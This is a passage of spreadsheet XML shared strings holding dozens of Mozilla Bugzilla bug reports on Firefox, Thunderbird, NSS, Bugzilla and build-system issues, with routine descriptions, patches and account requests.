  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-191367</t>
  </si>
  <si>
    <t>gf-forsikring.dk - [TOOL][Web500 CMS]</t>
  </si>
  <si>
    <t>uses old version and completely refuses access to netscape
workaround works</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-511219</t>
  </si>
  <si>
    <t>LDAP Account for Nochum Sossonko (Natch)</t>
  </si>
  <si>
    <t>Natch has been contributing patches on Firefox bugs lately and while he doesn't yet have the background necessary for commit access it would be a great help if he could access the try server. My understanding is that a) a no-commit-access LDAP account should suffice (though he still couldn't push-to-try) and b) that we have given these accounts out to people in Natch's situation in the past.
What information does Natch (cc'd) need to supply to make this happen?</t>
  </si>
  <si>
    <t>CORE-193092</t>
  </si>
  <si>
    <t>Proxy: document contains no data alert message when proxy cannot be reached</t>
  </si>
  <si>
    <t>When a proxy server is configured and cannot be reached the wrong error message
The document contains no data is shown in an alert box. This will probably
confuse a lot of users and is simply wrong.
This seems to be relatively new: it happens with the 1.3b on linux and NT and
the 20030212/linux trunk build. It does not happen with the 20021211/linux build
which gives the correct error message (The connection was refused when
attempting to contact the proxy server you have configured. Please check your
proxy settings and try again).</t>
  </si>
  <si>
    <t>johann.petrak</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-556256</t>
  </si>
  <si>
    <t>Explicitly set MOZ_MORKREADER and MOZ_MORK for Thunderbird and SeaMonkey and sync enable places changes from bug 516758</t>
  </si>
  <si>
    <t>Created attachment 436174
The fix
Following on from bug 516758 and before bug 556253 happens I want to:
- explicitly set MOZ_MORK and MOZ_MORKREADER in confvars.sh for Thunderbird &amp; SeaMonkey.
-- Bug 556253 will be setting the default to MOZ_MORKREADER=1 and MOZ_MORK=
-- Note that both apps will have MOZ_MORK set to 1 as we both build mailnews.
-- Thunderbird will clear MOZ_MORKREADER as it doesn't currently need that. SeaMonkey doesn't need to add it as it builds places and therefore needs the mork reader.
-- SeaMonkey can have the MOZ_PLACES=1 removed as bug 516758 has set it by default.
- remove the --enable-places option as bug 516758 has done.
This won't affect 1.9.2 as:
- SeaMonkey doesn't build there.
- Thunderbird will just be explicit about what it is/isn't building.
- I don't care about --enable-places on 1.9.2 but in any case this removing the option from comm-central configure.in wouldn't have a bearing on that.</t>
  </si>
  <si>
    <t>CORE-307533</t>
  </si>
  <si>
    <t>[FIX] Caret drawn at incorrect position after typing a single LTR character in a blank RTL input field (or vice versa) while caret is visible</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Place the caret in a blank RTL input field or textarea
2. While the caret is visible (i.e. during the on half of the caret blink
cycle) type a single LTR (English) character.
3. The caret will appear to the left of the typed character instead of to its
right.
4. Deleting this character will now require two presses of backspace.
The same happens when typing a single RTL (Hebrew) character into a blank LTR
input field or textarea.
This does not happen if the character is typed while the caret is not visible
(i.e. during the off half of the blink cycle).
This regressed between 2005-08-10 and 2005-08-11 probably due to the checkin
for bug 296464.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-189750</t>
  </si>
  <si>
    <t>Image: Painting</t>
  </si>
  <si>
    <t>nsImage* compiler warnings</t>
  </si>
  <si>
    <t>I probably created these with Bug 181695</t>
  </si>
  <si>
    <t>CORE-491622</t>
  </si>
  <si>
    <t>DOS line endings on wlanapi.h</t>
  </si>
  <si>
    <t>Created attachment 375927
EOL conversion
The file netwerk/wifi/src/wlanapi.h was checked in with DOS line endings.  Here's a patch to fix that to have Unix line endings.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-459882</t>
  </si>
  <si>
    <t>Able to access https://www-trunk.stage.mozilla.com/en-US/firefox/3.1b1/firstrun/ without entering user name and password</t>
  </si>
  <si>
    <t>While testing the first run and release notes pages I noticed that it is possible to access these pages without entering a PW.
STR:
1. Visit https://www-trunk.stage.mozilla.com/en-US/firefox/3.1b1/firstrun/
2. When authentication dialog comes up keep canceling out.
3. After 5-7 times I can see almost all of the content on the page except the jet fighter.
Expected: I would not be able to see the site at all unless I enter my credentials.</t>
  </si>
  <si>
    <t>CORE-169534</t>
  </si>
  <si>
    <t>crash on opening page</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.2a) Gecko/20020910
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.2a) Gecko/20020910
Page contains only JavaScript that uses a regular expression to edit a string.
Reproducible: Always
Steps to Reproduce:
1.simply attempt to load page
2.
3.
Actual Results:  
get message that Mozilla has created an error and will shut down.  Message states
that a lod entry will be made but I cannot find the log.
Expected Results:  
Display result of editing string. If there is an error in the regular
expression report to me the error. The page loads correctly in IE 5.5
and Netscape 4.7.
I don't have the Talkback crash ID.  I will attempt again and amend this report.</t>
  </si>
  <si>
    <t>dick-curtis</t>
  </si>
  <si>
    <t>BUGZILLA-72837</t>
  </si>
  <si>
    <t>Bugzilla should produce JS version of Components/Products etc.</t>
  </si>
  <si>
    <t>We have continual trouble updating the Bugzilla Helper to keep in sync with 
component changes - the results of falling behind are scary messages about 
database corruption. What we really need is for Bugzilla to generate a .js 
file with data structures in to hold this information. This could then be used 
by the Bugzilla query form and things like Bugzilla Helper.
The query form already has something like this in it splitting them off into a 
separate file shouldn't be too hard. Filing this bug to keep track of the idea 
but it's probably 2.16 at the earliest. :-(
Gerv</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-315455</t>
  </si>
  <si>
    <t>Wrap commands in makexpi.sh to handle failure commonly</t>
  </si>
  <si>
    <t>I've updated makexpi.sh to use a bash function 'safeCommand' to do all the core operations in makexpi.sh (the function is just defined at the top of the file). The advantage of this is that if anything fails it does so the same as anything else - it spews the STDOUT and STDERR prints ERROR and quits.
It also has an updates to debug this operation (DEBUG=1) and the ability to override which Perl is used (default is 'perl').</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-469849</t>
  </si>
  <si>
    <t>Txul/Twinopen steady increase on XP machines</t>
  </si>
  <si>
    <t>The graph server URL referenced shows that there's been a steady increase in Txul/Twinopen on XP machines. A suggestion is that maybe this is a problem requiring a reboot - so maybe we should reboot _one_ machine and see if it unregresses the machines?</t>
  </si>
  <si>
    <t>CORE-372553</t>
  </si>
  <si>
    <t>[FIX]ASSERTION: Some frame destructors were not called with :first-letter wrapping</t>
  </si>
  <si>
    <t>Created attachment 257202
testcase (reload to see the assertion)
The testcase triggers the following assertion when reloaded / closed:
###!!! ASSERTION: Some frame destructors were not called: 'mFrameCount == 0' file /Users/jruderman/trunk/mozilla/layout/base/nsPresShell.cpp line 644
This assertion often indicates the presence of a security hole but I don't think that's true for this bug.
Also the rendering is incorrect -- the lowercase 'b's are missing.</t>
  </si>
  <si>
    <t>CORE-223349</t>
  </si>
  <si>
    <t>[FIXr]DOMSubtreeModified not fired in XUL SVG or XML</t>
  </si>
  <si>
    <t>I've gotten sick of the code duplication invoved in all the child list
mutations.  So I'm hoisting these functions up to nsGenericElement (oops XUL
still loses out) to make sure that people don't fix just HTML from now on.
Patch coming up that fixes this bug (XUL gets fixed by copying some code to make
it look like nsGenericElement... sigh... perhaps we need nsReallyGenericElement?
 ) )</t>
  </si>
  <si>
    <t>NSS-949615</t>
  </si>
  <si>
    <t>Delete unreachable code in ssl_DestroySID and ssl_LookupSID lib/ssl/sslnonce.c</t>
  </si>
  <si>
    <t>Created attachment 8346722
Patch
While looking into other bugs I found some unreachable code in
ssl_DestroySID and ssl_LookupSID lib/ssl/sslnonce.c.
1. ssl_DestroySID: In this function sid-&gt;references must be 0. Code
inspection shows that if |sid| is in the client cache the client
cache will own a reference. This implies |sid| cannot be in the
client cache. So sid-&gt;cached == in_client_cache will never be true.
I replaced the check with an assertion.
2. ssl_LookupSID: The function asserts sid-&gt;references &gt;= 1 so the
two !sid-&gt;references tests will always be false.
Perhaps in the past NSS used to leave orphaned (reference count 0)
sid's in the client cache and clean them up later.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-358251</t>
  </si>
  <si>
    <t>Need to remove New Mail Message keyboard shortcut from Keyboard Shortcuts page</t>
  </si>
  <si>
    <t>This functionality was removed in bug 306453 and people are citing it in bugs expecting it to work.</t>
  </si>
  <si>
    <t>CORE-379585</t>
  </si>
  <si>
    <t>implement IAccessibleTable</t>
  </si>
  <si>
    <t>THUNDERBIRD-382823</t>
  </si>
  <si>
    <t>Version/config bumps for Tb 2004</t>
  </si>
  <si>
    <t>Tracking bug for version and config bumps for the Thunderbird 2.0.0.4 release.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-279270</t>
  </si>
  <si>
    <t>When right-clicking images copy image copies the image location not the image</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8b) Gecko/20050120 Camino/0.8+
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8b) Gecko/20050120 Camino/0.8+
Not URL specific
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>tsengp</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-428173</t>
  </si>
  <si>
    <t>he / Hebrew</t>
  </si>
  <si>
    <t>[he-IL] Getting started page for Firefox 3 potential link changes</t>
  </si>
  <si>
    <t>NSS-340183</t>
  </si>
  <si>
    <t>Add the Netlock Class QA root certificate</t>
  </si>
  <si>
    <t>We can add the new Netlock Class QA root certificate to NSS
now because it no longer has the critical certificate
extension that NSS doesn't support (bug 277797).
As stated in bug 279728 comment 3 this root certificate
(the first one of the four roots in that comment)
- does NOT issue SSL server certificates
- issues email certificates
- issues code signing certificates
corresponding to the no yes yes answers to the
three questions in that comment.</t>
  </si>
  <si>
    <t>CORE-642721</t>
  </si>
  <si>
    <t>_cairo_d2d_mask reads uninitialized memory</t>
  </si>
  <si>
    <t>When 'clip' is NULL we reach
       box.p1.x = MAX(box.p1.x boxes-&gt;p1.x)
       box.p2.x = MIN(box.p2.x boxes-&gt;p2.x)
       box.p1.y = MAX(box.p1.y boxes-&gt;p1.y)
       box.p2.y = MIN(box.p2.y boxes-&gt;p2.y)
with 'boxes' set to &amp;box_stack which is uninitialized on the stack. We seem to be getting lucky most of the time and these operations are having no effect but with some patches in my queue we stop getting lucky and reftests start failing :-(.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-248199</t>
  </si>
  <si>
    <t>Requesting CVS access to check in files to the browser and toolkit directories in the CVS repository</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7) Gecko/20040614 Firefox/0.9
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7) Gecko/20040614 Firefox/0.9
Directories only require r= for CVS access so I just need a voucher.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>shorlander</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-436918</t>
  </si>
  <si>
    <t>qm-pleopard-trunk03 needs a reboot.</t>
  </si>
  <si>
    <t>Unreachable through vnc and ssh.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-267582</t>
  </si>
  <si>
    <t>xinhuanet.com - UTF-8 content reported as iso-8859-1</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 fr-FR rv:1.7.3) Gecko/20041027 Firefox/1.0RC1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 fr-FR rv:1.7.3) Gecko/20041027 Firefox/1.0RC1
French accented characters are improperly displayed on the page AND in source
code view. For example : where you would expect to see i with ^ accent
giving Ã® the page display these two characters: ÃƒÂ®.
Comparing both source code view and normal rendering of IE and Firefox show the
same error where IE is correct and Firefox wrong.
Reproducible: Always
Steps to Reproduce:
1. Display site the title should start with L'Ã®le where the character after
the apostrophe is an i with the accent ^ on top of it.
Actual Results:  
Some characters in title or on page improperly rendered both in title core page
and source view.
Expected Results:  
Show proper characters.</t>
  </si>
  <si>
    <t>micrond</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-257487</t>
  </si>
  <si>
    <t>royalbank.com - Can't paste numeric text into some online forms</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040803 Firefox/0.9.3
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040803 Firefox/0.9.3
When attempting to log into my online banking site I am unable to paste account
number information into the specified field.
This only occurs on one of my banking sites (URL specified above)
Good Luck  Thanks John
Reproducible: Always
Steps to Reproduce:
1. goto
https://www1.royalbank.com/cgi-bin/rbaccess/rbunxcgi?F6=1&amp;F7=IB&amp;F21=IB&amp;F22=IB&amp;REQUEST=ClientSignin&amp;LANGUAGE=ENGLISH
2. attempt to paste any number into the account number field
3. No paste occurs.
Actual Results:  
Nothing
Expected Results:  
incerted the copied number.</t>
  </si>
  <si>
    <t>jcgilmour</t>
  </si>
  <si>
    <t>CORE-517333</t>
  </si>
  <si>
    <t>NJ merge: move LIR 64-bit opcodes around for great aesthetic joy.</t>
  </si>
  <si>
    <t>Created attachment 401321
hardly warrants calling this a patch
It looks better doesn't it? I think so. Everyone does!</t>
  </si>
  <si>
    <t>BUGZILLA-454892</t>
  </si>
  <si>
    <t>Improve Bugzilla::CGI::clean_search_url to remove all the normal default fields</t>
  </si>
  <si>
    <t>Created attachment 338198
v1
This patch improves clean_search_url to remove all of the default fields that don't need to be in there--the extra clutter that still remains after a URL is cleaned.
One really nice thing about this patch is that it will now be impossible to actually do an empty query from query.cgi (thanks to bug 15089). It will still be possible to do it by hacking around with buglist.cgi but bots or novice users won't do it accidentally.</t>
  </si>
  <si>
    <t>THUNDERBIRD-353906</t>
  </si>
  <si>
    <t>Modernize mail's registry code to implement toolkit's nsIShellService</t>
  </si>
  <si>
    <t>In order to easier support the new vista registry code we need to modernize the mail registry code which is currently lumped together with the mapi code even though they are two different things.
This bug will track the re-writing our default app registration code as a shell service in mail\components\shell.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-334403</t>
  </si>
  <si>
    <t>fix mingw/win32 xulrunner bustage</t>
  </si>
  <si>
    <t>The win32 xulrunner tinderboxes are burning.  In addition there are some mingw-specific build issues.</t>
  </si>
  <si>
    <t>PARTICIPATION_INFRASTRUCTURE-894389</t>
  </si>
  <si>
    <t>Account Help</t>
  </si>
  <si>
    <t>PARTICIPATION_INFRASTRUCTURE</t>
  </si>
  <si>
    <t>Please change my email address in Mozillians.org</t>
  </si>
  <si>
    <t>My mozillians.org username is: fharper
My old email is: fharper@oocz.net
My new email is: fharper@mozilla.com</t>
  </si>
  <si>
    <t>fharper</t>
  </si>
  <si>
    <t>CORE-509696</t>
  </si>
  <si>
    <t>Empty role on body removes read-only state breaks virtual buffers</t>
  </si>
  <si>
    <t>The result is that for NVDA at least no virtual buffer is created. The construct is
...
This causes a DocAccessible to be created which has the nsIAccessibleStates::STATE_READONLY not set causing NVDA's virtual buffer logic not to create one.
This is obviously error in markup but we should handle it gracefully nonetheless.
Jamie found this in the Ext3JS recently released.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-335595</t>
  </si>
  <si>
    <t>Missing thunderbird xpi download link</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2
I submitted separate XPIs for Firefox and Thunderbird. Both got approved but the website shows only a link for the Firefox XPI.
Furthermore the page suggests that the Firefox file is also the one to use for Thunderbird.
At the moment there is no way to access the Thunderbird version of toolbarmode.
Reproducible: Always
Steps to Reproduce:
1. Browse to https://addons.mozilla.org/addon.php?id=568
Expected Results:  
Separate links for the Firefox and Thunderbird XPI respectively.</t>
  </si>
  <si>
    <t>mano</t>
  </si>
  <si>
    <t>CORE-220577</t>
  </si>
  <si>
    <t>List of properties that are meaningful for :first-line and :first-letter may change</t>
  </si>
  <si>
    <t>Current drafts of CSS2.1 have some changes to the list of properties that apply
to :first-line and :first-letter pseudo-elements...  Once the draft is in CR we
should revisit the code in nsHTMLCSSStyleSheet and adjust it as necessary.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-527041</t>
  </si>
  <si>
    <t>update product-details for Firefox 3.6 Beta 2</t>
  </si>
  <si>
    <t>There are some locales that we're adding for Beta 2 and some locales stay at beta 1 when the Firefox 3.6 Beta revision 2 comes out.
We'll need to update the website accordingly.
I'll create a concrete diff of languages once we have started builds.</t>
  </si>
  <si>
    <t>SEAMONKEY-254303</t>
  </si>
  <si>
    <t>1.7.2 tar.gz package has wrong permissions</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.2) Gecko/20040803 MultiZilla/1.6.4.0b
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.2) Gecko/20040803 MultiZilla/1.6.4.0b
Just installed the tar.gz package. The package unpacks as follows: 
nathan:/usr/local # l mozilla/
insgesamt 5080
drwxrwxrwx  12  500  500   4096 2004-08-04 19:16 ./
drwxr-xr-x  20 root root   4096 2004-08-04 19:19 ../
-rw-r--r--   1 root root      0 2004-08-04 19:16 .autoreg
-rw-rw-rw-   1  500  500  30869 1999-10-06 04:14 LICENSE
-rw-rw-rw-   1  500  500   9542 2004-03-13 07:25 README.txt
-rwxrwxrwx   1  500  500  20424 2004-08-03 22:07 TestGtkEmbed*
-rw-rw-rw-   1  500  500    208 2002-08-02 00:59 bloaturls.txt
drwxrwxr-x  22  500  500   4096 2004-08-04 19:16 chrome/
drwxrwxrwx   4  500  500   8192 2004-08-04 19:16 components/
drwxrwxrwx   8  500  500     87 2004-08-03 21:51 defaults/
-rwxrwxrwx   1  500  500   5460 2004-08-03 22:07 dirver*
-rwxrwxrwx   1  500  500  14552 2004-08-03 22:07 elf-dynstr-gc*
drwxrwxrwx   2  500  500     83 2004-08-03 18:59 greprefs/
etc. etc. i.e. most dirs and files are world writable and belong to a non-root
user. As a workaround one can 
chmod -R go-w mozilla
chown -R root.root mozilla
Please correct this problem - it imposes a security risk for many non-savvy users. 
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>hm</t>
  </si>
  <si>
    <t>BUGZILLA-357490</t>
  </si>
  <si>
    <t>Reorganize fields in show_bug.cgi and group links together</t>
  </si>
  <si>
    <t>As discussed on IRC...</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-518235</t>
  </si>
  <si>
    <t>Enable compare-locales</t>
  </si>
  <si>
    <t>We need to check in this library and tell AMO where to find it</t>
  </si>
  <si>
    <t>NSPR-450224</t>
  </si>
  <si>
    <t>PR_Interrupt() interrupts PR_TransmitFile() while PR_BlockInterrupt() in effect</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1.15) Gecko/20080612 Iceweasel/2.0.0.15 (Debian-2.0.0.15-0etch1)
Build Identifier: 4.7.1
The summary says it. I have 5 worker threads and 1 master thread in a server application. A worker thread after doing a PR_Accept() immediately calls PR_BlockInterrupt() so that it can serve the request to full completion. After it has served the request it calls PR_UnblockInterrupt() so that it can be interrupted by the worker thread issuing a PR_Interrupt() while the worker is blocking in PR_Accept(). 
The bug: The worker's PR_Interrupt() also interrupts the worker while it is in a PR_TransmitFile():
MASTER[11505]: Sending interrupt signal to worker threads.
MASTER[11505]: Thread 0 is blocked. Sent PR_Interrupt.
MASTER[11505]: Thread 1 is blocked. Sent PR_Interrupt.
MASTER[11505]: Thread 2 is blocked. Sent PR_Interrupt.
MASTER[11505]: Thread 3 is blocked. Sent PR_Interrupt.
MASTER[11505]: Thread 4 is blocked. Sent PR_Interrupt.
MASTER[11505]: Joining worker threads.
oops: PR_TransmitFile in do_cat: -5993: Operation interrupted by another thread
        [11505] Thread 2 is shutting down.
oops: PR_TransmitFile in do_cat: -5993: Operation interrupted by another thread
        [11505] Thread 0 is shutting down.
MASTER[11505]: Thread 0 successfully joined.
oops: PR_TransmitFile in do_cat: -5993: Operation interrupted by another thread
        [11505] Thread 3 is shutting down.
oops: PR_TransmitFile in do_cat: -5993: Operation interrupted by another thread
        [11505] Thread 1 is shutting down.
oops: PR_TransmitFile in do_cat: -5993: Operation interrupted by another thread
        [11505] Thread 4 is shutting down.
Reproducible: Always</t>
  </si>
  <si>
    <t>ziegler</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-414530</t>
  </si>
  <si>
    <t>toolkit/mozapps/update/src/updater/Makefile broken</t>
  </si>
  <si>
    <t>Created attachment 299980
Possible fix
Whenever I do complete trunk checkout and build it this makefile is broken (incompletely generated). The problem seems to be @APP_NAME@ variable in the makefile.in on which the preprocessor fails.
The attachment enclosed is my own (probably incorrect) fix for the problem. I don't see @APP_NAME@ in any other Makefile.in file in the tree.
Maybe this is problem of environment build config. However I am not the only one having this problem. This probably happens just on windows platform.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-502086</t>
  </si>
  <si>
    <t xml:space="preserve">SVN Account Request - Heather Arthur </t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.2a1pre) Gecko/20090702 Minefield/3.6a1pre
Build Identifier: 
I need commit access to the QAC at http://svn.mozilla.org/qa/qac. I won't need superreviewer approval.
Reproducible: Always</t>
  </si>
  <si>
    <t>heatherarthur</t>
  </si>
  <si>
    <t>BUGZILLA-240439</t>
  </si>
  <si>
    <t>Edit user again link fails if user has a + in their email address</t>
  </si>
  <si>
    <t>If the user has a + in their email address the edit user again link in
editusers.cgi fails.</t>
  </si>
  <si>
    <t>FIREFOX-420028</t>
  </si>
  <si>
    <t>FUEL: browser_Extensions.js test requires DOM Inspector</t>
  </si>
  <si>
    <t>Test failures on Windows today:
FAIL - Check extension for existance - chrome://mochikit/content/browser/browser/fuel/test/browser_Extensions.js
FAIL - Exception thrown - TypeError: inspector is null - chrome://mochikit/content/browser/browser/fuel/test/browser_Extensions.js
I assume the other platforms haven't hit this because they haven't clobbered yet.
I'm disabling this test (browser/fuel/test/browser_Extensions.js) because there doesn't seem to be an obvious was to fix it offhand.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-773504</t>
  </si>
  <si>
    <t>Configure Win8 on new iX node</t>
  </si>
  <si>
    <t>Since we only have a relatively small number of the HP boxes we should try to get Win8 setup on one of the new iX nodes
From https://bugzilla.mozilla.org/show_bug.cgi?id=765275#c7 :
ix-mn-1-a.winbuild.scl1.mozilla.com is now running the latest release candidate for w8 and can be accessed via RDP.</t>
  </si>
  <si>
    <t>BUGZILLA-143743</t>
  </si>
  <si>
    <t>Warning generated in dependency tree</t>
  </si>
  <si>
    <t>The dependency tree template generates a warning because not all dependencies
have dependencies themselves and there is one condition in display_tree block
which doesn't check for this. The warning message:
Argument  isn't numeric in numeric gt (&gt;) at 
data/template/en/default/bug/dependency-tree.html.tmpl line 284 (#1) (W 
numeric) The indicated string was fed as an argument to an operator that 
expected a numeric value instead. If you're fortunate the message will identify 
which operator was so unfortunate. [Sat May 11 19:00:28 2002] 
Patch follows. Ccing Burnus and Myk (template authors) for comments/review.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-387475</t>
  </si>
  <si>
    <t>query that returns un-assigned test cases</t>
  </si>
  <si>
    <t>un-assigned test cases are not executed by testers becasue it's hard to find them so will be nice to have such query so from time to time admins can check if there are any tests that need to be assigned to sub groups</t>
  </si>
  <si>
    <t>damian.publicemail</t>
  </si>
  <si>
    <t>CORE-202638</t>
  </si>
  <si>
    <t>Offline: no error/notification when interupting page load</t>
  </si>
  <si>
    <t>current cvs build linux
If I click the offline button in Mozilla while a page is currently loading the
throbber &amp; progressbar still show progress and the statusbar still shows
Loading page even though nothing is loading.
I would expect some kind of error message or at least
throbber/progressbar/statusbar quietly stopping.</t>
  </si>
  <si>
    <t>NSS-418398</t>
  </si>
  <si>
    <t>Need some high level libpkix tracing for mental sanity</t>
  </si>
  <si>
    <t>We had discussed this in the past:
libpkix produces tons of trace output. It's too much to be of real help.
Today I tried to analyze bug 418367.
Again I was frustrated about monster function pkix_BuildForwardDepthFirstSearch which is really hard to trace because it tries several alternatives and even if it finds a failure it might continue to test. So it's really really difficult to know where to look.
I decided I need some high level tracing to understand which certificate is currently being tested.
Also I should have a log of the failures only to understand which temporary failures occurred and which temporary failure might have caused the final failure.
I am attaching a patch that greatly helped me in identifying this case.
I think the patch is not appropriate for check in as is because I used fprintf(stderr) to ensure I get exactly this output without anything else (that would confuse me by amount).
I am attaching a logfile that was produced with this patch as an illustration what this patch does.
I certainly will use this patch whenever I have to debug cert verification failures in the future.</t>
  </si>
  <si>
    <t>TESTOPIA-406919</t>
  </si>
  <si>
    <t>Environments</t>
  </si>
  <si>
    <t>Right clicking on the Any Product node does not allow the user to see the correct options</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Build Identifier: 
By right clicking on the Any Product node there is another pop up window with the browser options like Bookmark This Page etc..
Reproducible: Always
Steps to Reproduce:
1. Go to the page http://landfill.bugzilla.org/testopia_tip/tr_admin_environment.cgi
2. Under the heading Environment Variables right click on the first folder icon or on Any Product node
Actual Results:  
There is a different pop up window covering the actual pop up window which asks for Add Category Add Element etc
Expected Results:  
The other pop up window which shows option like Reload Save page as etc should not be displayed.</t>
  </si>
  <si>
    <t>madhurimav_3</t>
  </si>
  <si>
    <t>THUNDERBIRD-367723</t>
  </si>
  <si>
    <t>no import wizard popup when thunderbird first start</t>
  </si>
  <si>
    <t>When start thunderbird the first time (simulate it by removing $HOME/.thunderbird under Linux) there should be a import wizard dialog popup.
At least TB 1.5 and 2.0 do so.
it's a regression for trunk build.</t>
  </si>
  <si>
    <t>BUGZILLA-476597</t>
  </si>
  <si>
    <t>Emergency Release: 3.2.2 3.0.8 and 3.3.3</t>
  </si>
  <si>
    <t>Because of bug 476594 we need another set of releases immediately.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-420928</t>
  </si>
  <si>
    <t>default entry on win32+wince should be mainWCRTStartup</t>
  </si>
  <si>
    <t>See usages:
http://lxr.mozilla.org/mozilla/search?string=wmainCRTStartup</t>
  </si>
  <si>
    <t>BUGZILLA-356336</t>
  </si>
  <si>
    <t>Crash when calling showdependencytree.cgi with no bug ID</t>
  </si>
  <si>
    <t>All you have to do is to call showdependencytree.cgi with no parameters. You get:
Undef to trick_taint at Bugzilla/Util.pm line 67
	Bugzilla::Util::trick_taint('undef') called at Bugzilla/Bug.pm line 1293
	Bugzilla::Bug::bug_alias_to_id('undef') called at Bugzilla/Bug.pm line 1910
	Bugzilla::Bug::ValidateBugID('undef') called at /var/www/html/cvsbugzilla/showdependencytree.cgi line 53</t>
  </si>
  <si>
    <t>CORE-486933</t>
  </si>
  <si>
    <t>image-rendering does not work on body or root CSS background images</t>
  </si>
  <si>
    <t>NSS-258366</t>
  </si>
  <si>
    <t>port PKCS1 v1.5 data encryption funcs from 3.9 branch</t>
  </si>
  <si>
    <t>This bug was originally filed on Sept 1 2004 as bugscape bug 57169 
because buzilla.mozilla.org was down that day.
NSS has two functions that encrypt data with RSA public keys and decrypt data
with private keys.  These functiosn do raw RSA not PKCS1 block formatting.
They were provided to facilitate SSL2 IIRC.  
NSS doesn't provide anything comparable that uses PKCS1 v1.5 block formatting.
NSS's public APIs facilitate PKCS1 RSA for key wrapping/unwrapping but not
for data en/decryption.  
This has been fixed on the NSS 3.9 branch with the introduction of two
new functions: PK11_PubEncryptPKCS1 and  PK11_PrivDecryptPKCS1.  See 
http://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&amp;whitespace_mode=show&amp;root=/cvsroot&amp;subdir=mozilla/security/nss/lib/pk11wrap&amp;command=DIFF_FRAMESET&amp;root=/cvsroot&amp;file=pk11skey.c&amp;rev1=1.84.2.3&amp;rev2=1.84.2.4
This bug requests that those fixes be ported to the trunk.  Note that the 
file names are different on the trunk because the source has been refactored
there.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-392557</t>
  </si>
  <si>
    <t>Unsubscribe gerv from trademarks@mozilla.com</t>
  </si>
  <si>
    <t>I am currently CCed on all mail to trademarks@mozilla.com (note the .com). Please remove this CC.
trademarks@mozilla._org_ mail arrangements should be unchanged.
Many thanks
Gerv</t>
  </si>
  <si>
    <t>CORE-104326</t>
  </si>
  <si>
    <t>Hidden carriage return in textarea</t>
  </si>
  <si>
    <t>Carriage return in textarea doesn't appear.
test
This shoould be displayed as test and carriage return but
the latter isn't displayed.
In fact there is a carriage return code(0x0d0a). it is passed
to CGI script. Try the following testcase.
http://www.mozilla.gr.jp/~kazhik/testcase/1439.html</t>
  </si>
  <si>
    <t>SEAMONKEY-242991</t>
  </si>
  <si>
    <t>export addressbook is broken</t>
  </si>
  <si>
    <t>export addressbook is broken.
see bug #44494 for details and the fix.
it's a regression from the change for bug #240723</t>
  </si>
  <si>
    <t>NSS-229289</t>
  </si>
  <si>
    <t>Unused variable 'i' in pk11_DestroySessionObjectData() lib/softoken/pkcs11u.c</t>
  </si>
  <si>
    <t>In lib/softoken/pkcs11u.c rev. 1.53 function
pk11_DestroySessionObjectData() the local variable 'i'
is unused if neither PKCS11_STATIC_ATTRIBUTES nor
PKCS11_REF_COUNT_ATTRIBUTES is defined.</t>
  </si>
  <si>
